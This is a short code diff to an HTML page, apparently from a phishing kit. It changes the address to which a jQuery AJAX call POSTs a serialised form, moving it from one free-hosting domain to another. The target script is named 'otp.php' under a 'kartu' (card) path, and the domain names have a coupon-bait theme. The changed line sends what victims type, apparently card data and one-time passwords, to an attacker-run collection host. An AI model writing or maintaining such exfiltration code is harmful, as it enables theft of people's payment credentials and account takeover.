--- a/ot1.html
+++ b/ot1.html
@@ -362,7 +362,7 @@ function out() {
     
  $.ajax({
  type: 'POST',
- url: 'https://dapatkan-001-site1.ltempurl.com/kartu/otp.php',
+ url: 'https://ambil1kupon-001-site1.mtempurl.com/kartu/otp.php',
  data: $('#ryuSubmit').serialize(),
         
 })
